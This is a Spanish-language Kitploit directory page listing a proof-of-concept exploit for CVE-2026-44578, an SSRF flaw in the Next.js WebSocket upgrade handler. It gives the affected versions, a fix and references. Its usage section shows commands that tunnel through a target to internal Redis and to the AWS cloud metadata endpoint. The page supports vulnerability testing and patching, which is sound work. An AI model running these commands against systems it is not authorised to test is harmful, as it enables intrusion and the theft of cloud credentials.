Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-44578-PoC — Exploit de prueba de concepto para CVE-2026-44578, una vulnerabilidad de Server-Side Request Forgery en el manejador de actualización WebSocket de Next.js. Incluye modo de detección y tunelización a servicios internos como Redis o endpoints de metadatos en la nube. | Kitploit
Herramientas/GitHubGitHub/tocong282/cve-2026-44578-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónSeguridad en la Nube
GitHubtocong282/cve-2026-44578-poc

CVE-2026-44578-PoC

Exploit de prueba de concepto para CVE-2026-44578, una vulnerabilidad de Server-Side Request Forgery en el manejador de actualización WebSocket de Next.js. Incluye modo de detección y tunelización a servicios internos como Redis o endpoints de metadatos en la nube.

Ver Repositorio
35hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-44578 - PoC de SSRF en WebSocket de Next.js

Vulnerabilidad: Falsificación de solicitudes del lado del servidor en el manejador de actualización WebSocket de Next.js (13.4.13 → 15.5.15, 16.0.0 → 16.1.6)

Uso

root@kitploit:~
# Detect vulnerability
python3 poc.py target.com:3000 --detect

# Tunnel to internal Redis
python3 poc.py target.com:3000 --internal 127.0.0.1:6379 --payload "INFO\r\n"

# Tunnel to AWS metadata
python3 poc.py target.com:3000 --internal 169.254.169.254:80 --payload "GET /latest/meta-data/ HTTP/1.0\r\n\r\n"

Solución

Actualice a Next.js 15.5.16 o 16.2.5

Referencias

  • https://hadrian.io/blog/next-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2
  • GHSA-c4j6-fc7j-m34r
Descargar herramienta